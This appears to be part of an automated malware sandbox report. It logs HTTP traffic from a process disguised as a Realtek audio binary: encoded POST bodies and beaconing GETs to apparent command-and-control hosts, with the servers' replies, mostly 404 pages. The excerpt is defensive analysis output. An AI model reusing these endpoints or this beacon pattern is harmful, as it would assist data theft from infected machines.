                                                                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              22192.168.11.2049780154.23.178.231806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:22.888964891 CET766OUTPOST /p3j6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              Origin: http://www.43kdd.top
                                                                                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 33 71 35 38 59 7a 6c 57 76 45 36 32 56 4c 64 47 65 4c 36 75 4e 4b 62 36 75 4f 49 4c 2f 75 58 78 4c 41 36 66 77 58 38 56 76 4c 42 47 7a 65 61 44 4f 6c 6e 64 34 33 75 49 59 6e 43 4d 30 36 36 43 58 51 31 51 6a 4a 35 35 47 50 6e 71 61 72 51 79 63 39 4d 69 52 53 65 71 4a 4e 2b 69 79 65 78 4f 61 6b 67 69 49 6e 64 54 4e 56 7a 32 44 4b 57 4c 59 70 6a 34 57 7a 6a 2b 61 6f 56 50 39 77 59 58 34 4e 34 56 51 6d 57 38 74 43 33 33 63 42 43 4d 4a 54 4f 4d 6c 7a 6f 6c 36 66 4e 36 50 6c 75 32 53 46 49 49 38 75 47 56 6a 6f 39 58 63 3d
                                                                                                                                                                              Data Ascii: iS=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4Klhh3q58YzlWvE62VLdGeL6uNKb6uOIL/uXxLA6fwX8VvLBGzeaDOlnd43uIYnCM066CXQ1QjJ55GPnqarQyc9MiRSeqJN+iyexOakgiIndTNVz2DKWLYpj4Wzj+aoVP9wYX4N4VQmW8tC33cBCMJTOMlzol6fN6Plu2SFII8uGVjo9Xc=
                                                                                                                                                                              Jan 11, 2025 03:56:23.193897009 CET312INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:23 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              23192.168.11.2049781154.23.178.231806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:25.718099117 CET3867OUTPOST /p3j6/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              Origin: http://www.43kdd.top
                                                                                                                                                                              Referer: http://www.43kdd.top/p3j6/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 44 58 35 57 42 7a 37 50 69 38 6b 64 6a 56 75 64 52 6a 76 59 63 38 5a 45 69 75 79 6b 48 36 72 6b 55 6c 4e 61 55 34 4b 6c 68 68 50 71 35 76 51 7a 6b 31 33 45 39 32 56 4c 65 47 65 4b 36 75 4e 54 62 36 32 43 49 4d 33 55 58 7a 7a 41 37 38 6f 58 33 45 76 4c 50 47 7a 65 56 6a 4f 34 36 74 34 69 75 4a 6f 38 43 4d 45 36 36 43 58 51 31 57 50 4a 37 6f 47 50 30 61 61 6f 5a 53 63 4c 62 79 52 32 65 72 74 33 2b 69 47 4f 77 2b 36 6b 67 43 59 6e 4f 52 6c 56 73 47 44 45 62 72 5a 38 6a 35 71 73 6a 34 2b 6b 56 50 49 56 59 55 49 4e 70 69 4e 4b 47 34 6f 55 6b 6b 59 57 4b 34 4a 32 4d 2b 6b 69 6c 55 79 51 44 4a 62 52 78 51 53 44 4c 4b 67 30 66 47 72 35 6f 44 6b 71 66 62 2f 43 4a 4f 5a 42 64 46 50 43 42 6f 59 61 62 43 53 31 79 6d 54 7a 64 72 37 55 6e 76 6c 59 64 35 59 52 78 54 4d 77 65 79 7a 67 45 46 72 70 50 45 63 52 43 34 61 5a 63 2f 4a 54 46 56 72 37 58 7a 75 39 43 6f 68 2f 54 42 2f 30 4d 36 51 43 6f 2b 30 54 32 39 4d 63 79 67 39 39 79 64 55 6e 6b 77 30 55 52 65 58 34 59 41 71 58 2b 56 41 6a 6d 6c 43 6c 63 2b 2b [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=DX5WBz7Pi8kdjVudRjvYc8ZEiuykH6rkUlNaU4KlhhPq5vQzk13E92VLeGeK6uNTb62CIM3UXzzA78oX3EvLPGzeVjO46t4iuJo8CME66CXQ1WPJ7oGP0aaoZScLbyR2ert3+iGOw+6kgCYnORlVsGDEbrZ8j5qsj4+kVPIVYUINpiNKG4oUkkYWK4J2M+kilUyQDJbRxQSDLKg0fGr5oDkqfb/CJOZBdFPCBoYabCS1ymTzdr7UnvlYd5YRxTMweyzgEFrpPEcRC4aZc/JTFVr7Xzu9Coh/TB/0M6QCo+0T29Mcyg99ydUnkw0UReX4YAqX+VAjmlClc++PEIkOW62PVndItNl5W06rreFycQ77gdJJxibRRqR1kHcrNo2itPCbnvTOhkE+qrZcYEFvO9rF0YibJ4EKsbb76L8ZIxDeZWokM5Ct3OLpAKovb3AXZzTwzgnhIA00HGwqTE+SWYHocGezh/2YH2n+O/Q9BuJeTF+RzbmHq5EAlD+M1VB3yC3IfwT0x4kjpXQktFwj5G9QhXDgcNEt6XuSaeC/FvZgHk7AGwmyW03ayf5qStkjRtXKqPApYlQTYTSERl/l8xfjOBrHJODInzXHnPZDAzi7V3jWFCugMRY32EpWDAPT98VU1dstyja03UETmtfjgrpBSx6Z4KgKEeWjiNgnrQNu44Txucal2kt1QDDu6P1DfQrHkBGlX3Un/i+nwfpsvtYKw8K51kQUlbsKHygsLVdJ0z7wRwGinyasKWBLFQKnSIMb4vnXSg/Ze7BV0zrmeRvsduaJfE8pwyFLMX9R3BOai9EdJDMxm0cKOAspUbFSFUhF+E+3weloXh1PHFFpFdg3QM5yChRLYLbDJeUfe9NOVbuT8/8BzIAzY8a6gK6UPzKCU258ZNwglQT4CCAW8t+G6tRueUFS73KYKZeelwaTP4i0CRMh2riEr7Msc3eqszoKndWqHuzgv7Yz/CMnVWEi/Q+Gc9/q8zf8NRlkWMuCUEmhg [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:56:25.718147993 CET4048OUTData Raw: 42 75 59 48 43 46 52 4f 75 37 62 30 44 77 4b 38 6d 41 6b 65 76 7a 62 54 79 6f 39 66 6c 48 65 30 42 73 47 4b 37 33 68 63 42 78 68 32 35 72 62 74 50 59 44 39 58 6c 6e 5a 53 76 53 37 35 46 79 4f 48 38 4e 4c 68 33 6c 36 57 34 45 47 48 37 54 6c 77 6f
                                                                                                                                                                              Data Ascii: BuYHCFROu7b0DwK8mAkevzbTyo9flHe0BsGK73hcBxh25rbtPYD9XlnZSvS75FyOH8NLh3l6W4EGH7TlwoAK/w+D/xnxXStF//o5Dlf4zfFVWHiJ3peDQT8XQF7yKJYp/exxiHSH1vna/kwhdxh9G14pbUgYls/2M54fDO+WPSKysns6r+0kvfWLs7at2ZRkXSUgPYO+y0iOmoWwkQmi/MKu+PCTzG9V6QwMf360la5OWdATvYq
                                                                                                                                                                              Jan 11, 2025 03:56:26.024257898 CET312INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:25 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              24192.168.11.2049782154.23.178.231806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:28.543059111 CET484OUTGET /p3j6/?iS=OVR2CF7p+NAClGW2S0P2PNgTjoCVCaKiV2x0cNqPuUjpn/Qhs1nMs1l1ZXuPw6NSEK+YKob7dwv93+8G93LPPXy+SQSX5+Y6iKJbGa1Xxz7I+GHh/5eIgvw=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.43kdd.top
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:56:28.847944975 CET312INHTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:28 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 148
                                                                                                                                                                              Connection: close
                                                                                                                                                                              ETag: "67811756-94"
                                                                                                                                                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              25192.168.11.2049783208.91.197.39806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:34.180754900 CET746OUTPOST /hxi5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              Origin: http://www.jcsa.info
                                                                                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 74 6c 78 6b 34 30 52 66 2b 63 6b 4d 77 64 69 76 59 61 35 6a 77 55 48 70 6e 73 4b 33 52 53 62 72 37 64 46 74 74 47 69 37 65 70 36 44 58 6d 6b 37 4c 6b 5a 6a 6e 33 4c 55 70 49 58 69 52 41 38 4f 33 6b 6e 4e 31 65 53 42 66 78 78 6b 2f 34 2b 4f 41 64 75 56 6d 6e 59 73 33 52 7a 65 7a 6f 33 4a 67 46 61 39 57 74 75 6a 56 4d 78 6d 4c 56 73 63 2f 59 58 44 64 2f 57 55 50 41 44 6a 32 6a 47 76 30 6d 72 37 4d 6f 30 42 59 58 6d 2b 54 72 69 2b 61 4a 36 53 46 38 6a 50 4d 33 4d 2b 54 32 59 43 49 50 46 57 47 31 49 58 4b 75 52 63 6f 55 6d 4a 57 4c 6a 44 41 3d 3d
                                                                                                                                                                              Data Ascii: iS=yzleTXLhZhPoxtlxk40Rf+ckMwdivYa5jwUHpnsK3RSbr7dFttGi7ep6DXmk7LkZjn3LUpIXiRA8O3knN1eSBfxxk/4+OAduVmnYs3Rzezo3JgFa9WtujVMxmLVsc/YXDd/WUPADj2jGv0mr7Mo0BYXm+Tri+aJ6SF8jPM3M+T2YCIPFWG1IXKuRcoUmJWLjDA==


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              26192.168.11.2049784208.91.197.39806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:36.847908974 CET766OUTPOST /hxi5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              Origin: http://www.jcsa.info
                                                                                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 4e 31 78 6f 37 73 52 49 4f 63 6e 51 67 64 69 34 49 61 6c 6a 77 59 48 70 6d 5a 58 30 69 6d 62 72 5a 31 46 73 73 47 69 75 65 70 36 4c 33 6e 75 6d 62 6b 6f 6a 6d 4b 32 55 70 30 58 69 52 55 38 4f 31 73 6e 4d 43 4b 54 42 50 78 7a 2f 50 34 38 41 67 64 75 56 6d 6e 59 73 33 46 56 65 31 41 33 4a 51 56 61 37 7a 52 74 2f 6c 4d 79 79 62 56 73 4e 76 59 54 44 64 2f 77 55 4d 45 74 6a 30 62 47 76 78 61 72 31 39 6f 31 57 49 57 74 7a 7a 71 2b 7a 5a 59 70 5a 78 63 57 46 50 48 32 36 6a 69 48 44 65 43 66 4c 30 42 73 55 5a 79 6a 59 59 74 4f 4c 55 4b 34 65 4b 64 78 55 78 4d 4f 38 51 48 39 79 59 74 4c 66 69 4f 41 63 72 49 3d
                                                                                                                                                                              Data Ascii: iS=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0imbrZ1FssGiuep6L3numbkojmK2Up0XiRU8O1snMCKTBPxz/P48AgduVmnYs3FVe1A3JQVa7zRt/lMyybVsNvYTDd/wUMEtj0bGvxar19o1WIWtzzq+zZYpZxcWFPH26jiHDeCfL0BsUZyjYYtOLUK4eKdxUxMO8QH9yYtLfiOAcrI=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              27192.168.11.2049785208.91.197.39806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:39.518979073 CET2440OUTPOST /hxi5/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 7367
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              Origin: http://www.jcsa.info
                                                                                                                                                                              Referer: http://www.jcsa.info/hxi5/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Data Raw: 69 53 3d 79 7a 6c 65 54 58 4c 68 5a 68 50 6f 78 4e 31 78 6f 37 73 52 49 4f 63 6e 51 67 64 69 34 49 61 6c 6a 77 59 48 70 6d 5a 58 30 6a 65 62 71 6f 56 46 73 4c 71 69 6f 75 70 36 46 58 6e 74 6d 62 6b 50 6a 6d 53 79 55 70 34 68 69 54 73 38 4f 51 67 6e 46 54 4b 54 4b 50 78 7a 33 76 34 2f 4f 41 64 42 56 6c 50 63 73 33 56 56 65 31 41 33 4a 57 5a 61 38 6d 74 74 73 31 4d 78 6d 4c 56 4a 63 2f 59 76 44 64 6e 4f 55 4e 77 54 69 41 76 47 76 52 71 72 33 50 77 31 4a 34 57 76 77 7a 71 32 7a 5a 56 78 5a 31 38 77 46 4f 6a 51 36 69 36 48 42 5a 6a 62 61 47 39 37 47 49 58 76 5a 72 51 34 4c 53 61 47 58 37 5a 30 64 7a 63 63 79 41 44 46 7a 35 4a 52 4e 33 48 46 66 75 47 46 37 6f 77 33 47 35 4c 36 65 56 36 70 68 4e 77 45 51 38 41 52 2b 63 78 6c 45 76 4e 77 56 71 47 5a 5a 4d 47 31 53 57 4e 51 33 67 31 61 41 43 55 50 4a 31 59 33 49 7a 67 37 75 55 30 6e 47 78 53 47 74 51 57 43 54 77 69 77 67 51 4d 65 4d 77 41 67 55 6e 32 6b 47 51 69 42 52 65 73 62 46 36 55 66 38 6b 70 45 71 4c 5a 4f 76 78 46 6c 6f 67 54 47 4a 6d 6c 79 5a 4b 69 [TRUNCATED]
                                                                                                                                                                              Data Ascii: iS=yzleTXLhZhPoxN1xo7sRIOcnQgdi4IaljwYHpmZX0jebqoVFsLqioup6FXntmbkPjmSyUp4hiTs8OQgnFTKTKPxz3v4/OAdBVlPcs3VVe1A3JWZa8mtts1MxmLVJc/YvDdnOUNwTiAvGvRqr3Pw1J4Wvwzq2zZVxZ18wFOjQ6i6HBZjbaG97GIXvZrQ4LSaGX7Z0dzccyADFz5JRN3HFfuGF7ow3G5L6eV6phNwEQ8AR+cxlEvNwVqGZZMG1SWNQ3g1aACUPJ1Y3Izg7uU0nGxSGtQWCTwiwgQMeMwAgUn2kGQiBResbF6Uf8kpEqLZOvxFlogTGJmlyZKikR4kjFv1KCh5Dvd+NCQrpTdjNz3Q/6eJAWYuHzTXWlW4PGGIVlQnRrgBT4g730Ukn4PU0hbOXamx0pOLGDG5fN0MLvYj6jkKgF+87DQouukdhJl4nLpQ2aplx4PZoBue+7fWhIUp/wTthfAyFcQza5J3mzq1KA0z4HYMCrV4N0l6F+YrRONtgMfGzzNlCSmcKjEhx5Yy1qEqqtI0ymbhfcUX81nLLcJgy/fAAxYX+jBLD/oQsSP/ethucWi/2HB+ZELMJ24CxmQbURIQ560Txw/LQw+Y4ojhgUKojIEPmUUA8MGXWkjya2tnu2EmawUWUgmXaJmb88A+4shHzTpyAb4gU4LSUFBKBY/eg1qfbFGS5U12gwQGuE87RzpfRfMjMIf8fPBWR8CV1knzsZWlcFAme72Y/p032z2gWtEzxXRu/PoEha1lfoaZ/KEiQt7A/anbhTvC7Z+q47iaSilYT5lMl2dOFpdyTAnV9Fpd3IVcE+7a2LcsxHqsD5d/E4CVwbh91bF082dbSR1F/ASXcOa/PxbUf6f1FelSIe0qen5NP91VGtGFhv1o/IuEUCn8t3/4Vy9WN4lNMjVpuPDZ9cFUn+Fu+EX5kGyj+zaqgsU4rJvvAYD+EAkoes3V25eAsKp1zPC7WjgIclE1iXt9LRBXBbMF6TAX6l [TRUNCATED]
                                                                                                                                                                              Jan 11, 2025 03:56:39.519007921 CET5475OUTData Raw: 67 56 56 57 31 55 6a 4d 6a 62 50 64 78 6a 4b 70 6d 66 6e 79 62 66 4a 64 6c 64 53 38 63 73 5a 48 53 66 68 37 76 72 35 70 30 4c 74 39 37 69 66 7a 48 4c 39 6a 78 65 7a 68 35 61 50 70 59 76 2f 6d 67 39 77 57 4a 59 2b 39 55 74 51 36 2b 68 73 75 48 76
                                                                                                                                                                              Data Ascii: gVVW1UjMjbPdxjKpmfnybfJdldS8csZHSfh7vr5p0Lt97ifzHL9jxezh5aPpYv/mg9wWJY+9UtQ6+hsuHvdO/ClJVVnAI9beDb9q6Mvze6iacXYekLStQZRylpiSg3FZfTgJbTqu76bd3jCiS4tiU3Ir/gl1UwDBxJinfOTkzClOrvZPAUfoibF7o6eMvlcRmPVZFEhKQCukTZjpacA7szafHMcpw15g6bTUdf3dj1ABnlheyxP


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              28192.168.11.2049786208.91.197.39806612C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              Jan 11, 2025 03:56:42.189434052 CET484OUTGET /hxi5/?iS=/xN+QifpSgLb8oJax+YyM6tUBGB4yp//ixYmgFld7FWiq7hEgfqLv69cCSKy7O4D9GLUZYEuvgkAAG4+HQzEHPV07OBsdCtve3vh4iUoSVc6KmBMx1Jirj8=&Bi=zJ_w6yPG HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                              Accept-Language: en-US
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Host: www.jcsa.info
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36
                                                                                                                                                                              Jan 11, 2025 03:56:43.045331001 CET990INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Sat, 11 Jan 2025 02:56:41 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                              Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version
                                                                                                                                                                              Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com")
                                                                                                                                                                              Set-Cookie: vsid=904vr484109802021745832; expires=Thu, 10-Jan-2030 02:56:42 GMT; Max-Age=157680000; path=/; domain=www.jcsa.info; HttpOnly
                                                                                                                                                                              X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_mhIwJkcXmIQtUN9NoTveXz3nUP25ykJtJDMnBBHF8xuiJ6DUqC9fx3NJJ9WyGlEqrzQxfDR2GyaB7ULAoBNGVw==
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Jan 11, 2025 03:56:43.045351028 CET193INData Raw: 61 64 30 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c
                                                                                                                                                                              Data Ascii: ad07<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="pre
                                                                                                                                                                              Jan 11, 2025 03:56:43.045366049 CET1220INData Raw: 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f
                                                                                                                                                                              Data Ascii: connect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window
                                                                                                                                                                              Jan 11, 2025 03:56:43.045620918 CET1220INData Raw: 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 5b 62 5d 2e 6c 29 7d 7d 7d 72 65 74 75 72 6e 20 61 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 6c 61 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 69 66 28 74 79 70 65 6f 66 28 6a 29 21 3d
                                                                                                                                                                              Data Ascii: mp_customlanguages[b].l)}}}return a};window.cmp_getlang=function(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupportedLangs();var c
